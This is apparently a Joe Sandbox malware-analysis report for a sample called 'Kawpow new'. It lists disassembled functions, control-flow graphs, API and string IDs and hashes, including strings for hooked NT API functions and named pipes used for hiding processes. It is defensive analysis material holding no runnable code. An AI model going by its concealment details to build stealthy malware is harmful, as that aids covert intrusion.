                          • Instruction ID: 440ed657f082d5170195954547255639f1e4cb2d291513d66c31c52a45d77218
                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                          • Instruction Fuzzy Hash: CB713C26324A0489EF50EF71E88865A23A8F78DB8CF0A1151DD5E67B39DF34C844CB72
                          Function 0000027E82472B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 301 27e82472b2c-27e82472ba5 call 27e82492ce0 304 27e82472ee0-27e82472f03 301->304 305 27e82472bab-27e82472bb1 301->305 305->304 306 27e82472bb7-27e82472bba 305->306 306->304 307 27e82472bc0-27e82472bc3 306->307 307->304 308 27e82472bc9-27e82472bd9 GetModuleHandleA 307->308 309 27e82472bed 308->309 310 27e82472bdb-27e82472beb GetProcAddress 308->310 311 27e82472bf0-27e82472c0e 309->311 310->311 311->304 313 27e82472c14-27e82472c33 StrCmpNIW 311->313 313->304 314 27e82472c39-27e82472c3d 313->314 314->304 315 27e82472c43-27e82472c4d 314->315 315->304 316 27e82472c53-27e82472c5a 315->316 316->304 317 27e82472c60-27e82472c73 316->317 318 27e82472c75-27e82472c81 317->318 319 27e82472c83 317->319 320 27e82472c86-27e82472c8a 318->320 319->320 321 27e82472c8c-27e82472c98 320->321 322 27e82472c9a 320->322 323 27e82472c9d-27e82472ca7 321->323 322->323 324 27e82472d9d-27e82472da1 323->324 325 27e82472cad-27e82472cb0 323->325 326 27e82472ed2-27e82472eda 324->326 327 27e82472da7-27e82472daa 324->327 328 27e82472cc2-27e82472ccc 325->328 329 27e82472cb2-27e82472cbf call 27e8247199c 325->329 326->304 326->317 332 27e82472dac-27e82472db8 call 27e8247199c 327->332 333 27e82472dbb-27e82472dc5 327->333 330 27e82472d00-27e82472d0a 328->330 331 27e82472cce-27e82472cdb 328->331 329->328 336 27e82472d0c-27e82472d19 330->336 337 27e82472d3a-27e82472d3d 330->337 331->330 335 27e82472cdd-27e82472cea 331->335 332->333 339 27e82472df5-27e82472df8 333->339 340 27e82472dc7-27e82472dd4 333->340 344 27e82472ced-27e82472cf3 335->344 336->337 345 27e82472d1b-27e82472d28 336->345 346 27e82472d3f-27e82472d49 call 27e82471bbc 337->346 347 27e82472d4b-27e82472d58 lstrlenW 337->347 342 27e82472e05-27e82472e12 lstrlenW 339->342 343 27e82472dfa-27e82472e03 call 27e82471bbc 339->343 340->339 349 27e82472dd6-27e82472de3 340->349 353 27e82472e35-27e82472e3f call 27e82473844 342->353 354 27e82472e14-27e82472e1e 342->354 343->342 369 27e82472e4a-27e82472e55 343->369 351 27e82472d93-27e82472d98 344->351 352 27e82472cf9-27e82472cfe 344->352 355 27e82472d2b-27e82472d31 345->355 346->347 346->351 357 27e82472d7b-27e82472d8d call 27e82473844 347->357 358 27e82472d5a-27e82472d64 347->358 359 27e82472de6-27e82472dec 349->359 362 27e82472e42-27e82472e44 351->362 352->330 352->344 353->362 354->353 363 27e82472e20-27e82472e33 call 27e8247152c 354->363 355->351 364 27e82472d33-27e82472d38 355->364 357->351 357->362 358->357 367 27e82472d66-27e82472d79 call 27e8247152c 358->367 368 27e82472dee-27e82472df3 359->368 359->369 362->326 362->369 363->353 363->369 364->337 364->355 367->351 367->357 368->339 368->359 374 27e82472ecc-27e82472ed0 369->374 375 27e82472e57-27e82472e5b 369->375 374->326 378 27e82472e63-27e82472e7d call 27e824785c0 375->378 379 27e82472e5d-27e82472e61 375->379 380 27e82472e80-27e82472e83 378->380 379->378 379->380 383 27e82472e85-27e82472ea3 call 27e824785c0 380->383 384 27e82472ea6-27e82472ea9 380->384 383->384 384->374 386 27e82472eab-27e82472ec9 call 27e824785c0 384->386 386->374
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction ID: 5d2ed3d7b3b34fc065d024df37ac3b9dc4ebe44713f4caf5c7a2a02d1de5e10c
                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction Fuzzy Hash: EEB19062218A588AEFA4CF25D8487AB63E9F748B84F4A5097EE5D537B4DB34CC40C371
                          Function 0000027E82477D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction ID: 2329d9bdf98cf03af7b2ed3bcd6a444f498866ae47961cea63c6dca51e09f7b7
                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction Fuzzy Hash: FB319272219B8489EF609F60E8443EE7368F788744F494469DB5D57BA4EF38C948C731
                          Function 0000027E8247D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction ID: 1c2b943c7d58d3d1971a63a76a6fc0e23cdccc6f0110782ab8828349c58c6c49
                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction Fuzzy Hash: 05319132218B808AEF60CF25E84439F73A8F78C754F590165EAAD57BA4DF38C945CB21
                          Function 0000027E82477960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction ID: bae5a53e7f4429e83a2a0e9d4612feb994081283a5fa345ed1758d72066f806e
                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction Fuzzy Hash: EE118222714F0089EF50CF60E8593A933A8F31D758F490E25DE6D56BB4DF78C59883A1
                          Function 0000027E8247DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                          • Instruction ID: 2d405ec51cd0b1919d2cd4a17c63cf152c14040573c415f76a69764ab8b01770
                          • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                          • Instruction Fuzzy Hash: C75107227146D48DFF20DB72A84839B7BA8F748794F194254EE6C27BA9DF39C801C721
                          Function 0000027E823336F0 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                          • Instruction ID: 2064d21985f5000671fa93e104d2a939b7ae9f3f2e816239d1b2b198c0e707c5
                          • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                          • Instruction Fuzzy Hash: 18F068717182558EDF988F28E51671A77D5F32C380FD1809AD68D93B18D23C9450CF15
                          Function 0000027E824712BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction ID: d1deb6fcf1c79b274480ba0982d9eec607482aa91205c9a653c6a98e377da29a
                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction Fuzzy Hash: 8A515932618B848AEF51CF62E44836B77A5F389F89F094124DA5E17729DF38C849CB21
                          Function 0000027E82471D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentThread$AddressHandleModuleProc
                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                          • API String ID: 4175298099-1975688563
                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction ID: 66ec0c77d005c83a4f0c2f9a9399ce50693a1e86d25bd3e750c7830ed6cdc325
                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction Fuzzy Hash: BC31E56411990EE4EE04EF65EC696D66368B70C344F8E00D3D86E225719F38CE49C3B2
                          Function 0000027E82326910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 147 27e82326910-27e82326916 148 27e82326951-27e8232695b 147->148 149 27e82326918-27e8232691b 147->149 150 27e82326a78-27e82326a8d 148->150 151 27e82326945-27e82326984 call 27e82326fc0 149->151 152 27e8232691d-27e82326920 149->152 156 27e82326a8f 150->156 157 27e82326a9c-27e82326ab6 call 27e82326e54 150->157 167 27e82326a52 151->167 168 27e8232698a-27e8232699f call 27e82326e54 151->168 154 27e82326922-27e82326925 152->154 155 27e82326938 __scrt_dllmain_crt_thread_attach 152->155 159 27e82326931-27e82326936 call 27e82326f04 154->159 160 27e82326927-27e82326930 154->160 163 27e8232693d-27e82326944 155->163 161 27e82326a91-27e82326a9b 156->161 170 27e82326aef-27e82326b20 call 27e82327190 157->170 171 27e82326ab8-27e82326aed call 27e82326f7c call 27e82326e1c call 27e82327318 call 27e82327130 call 27e82327154 call 27e82326fac 157->171 159->163 172 27e82326a54-27e82326a69 167->172 180 27e823269a5-27e823269b6 call 27e82326ec4 168->180 181 27e82326a6a-27e82326a77 call 27e82327190 168->181 182 27e82326b31-27e82326b37 170->182 183 27e82326b22-27e82326b28 170->183 171->161 200 27e823269b8-27e823269dc call 27e823272dc call 27e82326e0c call 27e82326e38 call 27e8232ac0c 180->200 201 27e82326a07-27e82326a11 call 27e82327130 180->201 181->150 184 27e82326b7e-27e82326b94 call 27e8232268c 182->184 185 27e82326b39-27e82326b43 182->185 183->182 189 27e82326b2a-27e82326b2c 183->189 208 27e82326b96-27e82326b98 184->208 209 27e82326bcc-27e82326bce 184->209 191 27e82326b4f-27e82326b5d call 27e82335780 185->191 192 27e82326b45-27e82326b4d 185->192 190 27e82326c1f-27e82326c2c 189->190 197 27e82326b63-27e82326b78 call 27e82326910 191->197 212 27e82326c15-27e82326c1d 191->212 192->197 197->184 197->212 200->201 250 27e823269de-27e823269e5 __scrt_dllmain_after_initialize_c 200->250 201->167 220 27e82326a13-27e82326a1f call 27e82327180 201->220 208->209 217 27e82326b9a-27e82326bbc call 27e8232268c call 27e82326a78 208->217 210 27e82326bd0-27e82326bd3 209->210 211 27e82326bd5-27e82326bea call 27e82326910 209->211 210->211 210->212 211->212 230 27e82326bec-27e82326bf6 211->230 212->190 217->209 242 27e82326bbe-27e82326bc6 call 27e82335780 217->242 239 27e82326a21-27e82326a2b call 27e82327098 220->239 240 27e82326a45-27e82326a50 220->240 236 27e82326c01-27e82326c11 call 27e82335780 230->236 237 27e82326bf8-27e82326bff 230->237 236->212 237->212 239->240 249 27e82326a2d-27e82326a3b 239->249 240->172 242->209 249->240 250->201 251 27e823269e7-27e82326a04 call 27e8232abc8 250->251 251->201
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                          • API String ID: 190073905-1786718095
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: ffee0eacb1c96b091f78b166d96eb4de203646e40c9847f1c54161d864085971
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: 0F81D46170C6438EFE549B25D47D35B22A9EF8CB83F0680E5990D433B6DB38CE458B22
                          Function 0000027E8247CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 254 27e8247ce28-27e8247ce4a GetLastError 255 27e8247ce69-27e8247ce74 FlsSetValue 254->255 256 27e8247ce4c-27e8247ce57 FlsGetValue 254->256 259 27e8247ce76-27e8247ce79 255->259 260 27e8247ce7b-27e8247ce80 255->260 257 27e8247ce59-27e8247ce61 256->257 258 27e8247ce63 256->258 261 27e8247ced5-27e8247cee0 SetLastError 257->261 258->255 259->261 262 27e8247ce85 call 27e8247d6cc 260->262 263 27e8247cee2-27e8247cef4 261->263 264 27e8247cef5-27e8247cf0b call 27e8247c748 261->264 265 27e8247ce8a-27e8247ce96 262->265 278 27e8247cf28-27e8247cf33 FlsSetValue 264->278 279 27e8247cf0d-27e8247cf18 FlsGetValue 264->279 267 27e8247cea8-27e8247ceb2 FlsSetValue 265->267 268 27e8247ce98-27e8247ce9f FlsSetValue 265->268 270 27e8247cec6-27e8247ced0 call 27e8247cb94 call 27e8247d744 267->270 271 27e8247ceb4-27e8247cec4 FlsSetValue 267->271 269 27e8247cea1-27e8247cea6 call 27e8247d744 268->269 269->259 270->261 271->269 282 27e8247cf98-27e8247cf9f call 27e8247c748 278->282 283 27e8247cf35-27e8247cf3a 278->283 280 27e8247cf1a-27e8247cf1e 279->280 281 27e8247cf22 279->281 280->282 285 27e8247cf20 280->285 281->278 287 27e8247cf3f call 27e8247d6cc 283->287 288 27e8247cf8f-27e8247cf97 285->288 290 27e8247cf44-27e8247cf50 287->290 291 27e8247cf62-27e8247cf6c FlsSetValue 290->291 292 27e8247cf52-27e8247cf59 FlsSetValue 290->292 294 27e8247cf6e-27e8247cf7e FlsSetValue 291->294 295 27e8247cf80-27e8247cf8a call 27e8247cb94 call 27e8247d744 291->295 293 27e8247cf5b-27e8247cf60 call 27e8247d744 292->293 293->282 294->293 295->288
                          APIs
                          • GetLastError.KERNEL32 ref: 0000027E8247CE37
                          • FlsGetValue.KERNEL32(?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CE4C
                          • FlsSetValue.KERNEL32(?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CE6D
                          • FlsSetValue.KERNEL32(?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CE9A
                          • FlsSetValue.KERNEL32(?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CEAB
                          • FlsSetValue.KERNEL32(?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CEBC
                          • SetLastError.KERNEL32 ref: 0000027E8247CED7
                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CF0D
                          • FlsSetValue.KERNEL32(?,?,00000001,0000027E8247ECCC,?,?,?,?,0000027E8247BF9F,?,?,?,?,?,0000027E82477AB0), ref: 0000027E8247CF2C
                            • Part of subcall function 0000027E8247D6CC: HeapAlloc.KERNEL32 ref: 0000027E8247D721
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CF54
                            • Part of subcall function 0000027E8247D744: HeapFree.KERNEL32 ref: 0000027E8247D75A
                            • Part of subcall function 0000027E8247D744: GetLastError.KERNEL32 ref: 0000027E8247D764
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CF65
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000027E82480A6B,?,?,?,0000027E8248045C,?,?,?,0000027E8247C84F), ref: 0000027E8247CF76
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Value$ErrorLast$Heap$AllocFree
                          • String ID:
                          • API String ID: 570795689-0
                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                          • Instruction ID: 9cb62cab20768c3a0c8639e6a61ccd162ca14b37d41cf502d0d6a4056217ea52
                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                          • Instruction Fuzzy Hash: 7141732020D64C49FE68A735955D36B118E9B4CBB0F1F0BA4AC3F567F6DE299C018633
                          Function 0000027E82472244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                          • API String ID: 2171963597-1373409510
                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                          • Instruction ID: 334a7f7215c3f5757749e1a7a21908b2866cde8e299582fe9df92aa4b8c2af2b
                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                          • Instruction Fuzzy Hash: E3216A32628B4083EF50CB25F44875A63A5F789BA4F590255EA6D12BB8CF7CC949CF21
                          Function 0000027E8247A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 520 27e8247a544-27e8247a5ac call 27e8247b414 523 27e8247aa13-27e8247aa1b call 27e8247c748 520->523 524 27e8247a5b2-27e8247a5b5 520->524 524->523 525 27e8247a5bb-27e8247a5c1 524->525 527 27e8247a690-27e8247a6a2 525->527 528 27e8247a5c7-27e8247a5cb 525->528 530 27e8247a963-27e8247a967 527->530 531 27e8247a6a8-27e8247a6ac 527->531 528->527 532 27e8247a5d1-27e8247a5dc 528->532 533 27e8247a9a0-27e8247a9aa call 27e82479634 530->533 534 27e8247a969-27e8247a970 530->534 531->530 535 27e8247a6b2-27e8247a6bd 531->535 532->527 536 27e8247a5e2-27e8247a5e7 532->536 533->523 547 27e8247a9ac-27e8247a9cb call 27e82477940 533->547 534->523 537 27e8247a976-27e8247a99b call 27e8247aa1c 534->537 535->530 539 27e8247a6c3-27e8247a6ca 535->539 536->527 540 27e8247a5ed-27e8247a5f7 call 27e82479634 536->540 537->533 543 27e8247a894-27e8247a8a0 539->543 544 27e8247a6d0-27e8247a707 call 27e82479a10 539->544 540->547 551 27e8247a5fd-27e8247a628 call 27e82479634 * 2 call 27e82479d24 540->551 543->533 548 27e8247a8a6-27e8247a8aa 543->548 544->543 556 27e8247a70d-27e8247a715 544->556 553 27e8247a8ac-27e8247a8b8 call 27e82479ce4 548->553 554 27e8247a8ba-27e8247a8c2 548->554 588 27e8247a62a-27e8247a62e 551->588 589 27e8247a648-27e8247a652 call 27e82479634 551->589 553->554 568 27e8247a8db-27e8247a8e3 553->568 554->533 555 27e8247a8c8-27e8247a8d5 call 27e824798b4 554->555 555->533 555->568 561 27e8247a719-27e8247a74b 556->561 565 27e8247a751-27e8247a75c 561->565 566 27e8247a887-27e8247a88e 561->566 565->566 569 27e8247a762-27e8247a77b 565->569 566->543 566->561 570 27e8247a8e9-27e8247a8ed 568->570 571 27e8247a9f6-27e8247aa12 call 27e82479634 * 2 call 27e8247c6a8 568->571 573 27e8247a874-27e8247a879 569->573 574 27e8247a781-27e8247a7c6 call 27e82479cf8 * 2 569->574 575 27e8247a900 570->575 576 27e8247a8ef-27e8247a8fe call 27e82479ce4 570->576 571->523 579 27e8247a884 573->579 601 27e8247a804-27e8247a80a 574->601 602 27e8247a7c8-27e8247a7ee call 27e82479cf8 call 27e8247ac38 574->602 584 27e8247a903-27e8247a90d call 27e8247b4ac 575->584 576->584 579->566 584->533 599 27e8247a913-27e8247a961 call 27e82479944 call 27e82479b50 584->599 588->589 593 27e8247a630-27e8247a63b 588->593 589->527 605 27e8247a654-27e8247a674 call 27e82479634 * 2 call 27e8247b4ac 589->605 593->589 598 27e8247a63d-27e8247a642 593->598 598->523 598->589 599->533 606 27e8247a80c-27e8247a810 601->606 607 27e8247a87b 601->607 621 27e8247a815-27e8247a872 call 27e8247a470 602->621 622 27e8247a7f0-27e8247a802 602->622 626 27e8247a68b 605->626 627 27e8247a676-27e8247a680 call 27e8247b59c 605->627 606->574 612 27e8247a880 607->612 612->579 621->612 622->601 622->602 626->527 630 27e8247a9f0-27e8247a9f5 call 27e8247c6a8 627->630 631 27e8247a686-27e8247a9ef call 27e824792ac call 27e8247aff4 call 27e824794a0 627->631 630->571 631->630
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                          • Instruction ID: 78ef4d805040892aa295baaae9bafa47688721c43ed7f0c1bbfa77adaaec4f9b
                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                          • Instruction Fuzzy Hash: 74E1E4726087988EEF20DF25D44839E77A8F748B98F0A0155EE9D57BA5CB34C891C732
                          Function 0000027E82329944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 399 27e82329944-27e823299ac call 27e8232a814 402 27e823299b2-27e823299b5 399->402 403 27e82329e13-27e82329e1b call 27e8232bb48 399->403 402->403 404 27e823299bb-27e823299c1 402->404 406 27e82329a90-27e82329aa2 404->406 407 27e823299c7-27e823299cb 404->407 409 27e82329d63-27e82329d67 406->409 410 27e82329aa8-27e82329aac 406->410 407->406 411 27e823299d1-27e823299dc 407->411 414 27e82329da0-27e82329daa call 27e82328a34 409->414 415 27e82329d69-27e82329d70 409->415 410->409 412 27e82329ab2-27e82329abd 410->412 411->406 413 27e823299e2-27e823299e7 411->413 412->409 417 27e82329ac3-27e82329aca 412->417 413->406 418 27e823299ed-27e823299f7 call 27e82328a34 413->418 414->403 425 27e82329dac-27e82329dcb call 27e82326d40 414->425 415->403 419 27e82329d76-27e82329d9b call 27e82329e1c 415->419 421 27e82329ad0-27e82329b07 call 27e82328e10 417->421 422 27e82329c94-27e82329ca0 417->422 418->425 433 27e823299fd-27e82329a28 call 27e82328a34 * 2 call 27e82329124 418->433 419->414 421->422 437 27e82329b0d-27e82329b15 421->437 422->414 426 27e82329ca6-27e82329caa 422->426 430 27e82329cac-27e82329cb8 call 27e823290e4 426->430 431 27e82329cba-27e82329cc2 426->431 430->431 443 27e82329cdb-27e82329ce3 430->443 431->414 436 27e82329cc8-27e82329cd5 call 27e82328cb4 431->436 467 27e82329a48-27e82329a52 call 27e82328a34 433->467 468 27e82329a2a-27e82329a2e 433->468 436->414 436->443 441 27e82329b19-27e82329b4b 437->441 445 27e82329b51-27e82329b5c 441->445 446 27e82329c87-27e82329c8e 441->446 448 27e82329ce9-27e82329ced 443->448 449 27e82329df6-27e82329e12 call 27e82328a34 * 2 call 27e8232baa8 443->449 445->446 450 27e82329b62-27e82329b7b 445->450 446->422 446->441 454 27e82329d00 448->454 455 27e82329cef-27e82329cfe call 27e823290e4 448->455 449->403 456 27e82329b81-27e82329bc6 call 27e823290f8 * 2 450->456 457 27e82329c74-27e82329c79 450->457 463 27e82329d03-27e82329d0d call 27e8232a8ac 454->463 455->463 480 27e82329c04-27e82329c0a 456->480 481 27e82329bc8-27e82329bee call 27e823290f8 call 27e8232a038 456->481 460 27e82329c84 457->460 460->446 463->414 478 27e82329d13-27e82329d61 call 27e82328d44 call 27e82328f50 463->478 467->406 484 27e82329a54-27e82329a74 call 27e82328a34 * 2 call 27e8232a8ac 467->484 468->467 472 27e82329a30-27e82329a3b 468->472 472->467 477 27e82329a3d-27e82329a42 472->477 477->403 477->467 478->414 488 27e82329c0c-27e82329c10 480->488 489 27e82329c7b 480->489 499 27e82329bf0-27e82329c02 481->499 500 27e82329c15-27e82329c72 call 27e82329870 481->500 505 27e82329a76-27e82329a80 call 27e8232a99c 484->505 506 27e82329a8b 484->506 488->456 490 27e82329c80 489->490 490->460 499->480 499->481 500->490 509 27e82329df0-27e82329df5 call 27e8232baa8 505->509 510 27e82329a86-27e82329def call 27e823286ac call 27e8232a3f4 call 27e823288a0 505->510 506->406 509->449 510->509
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
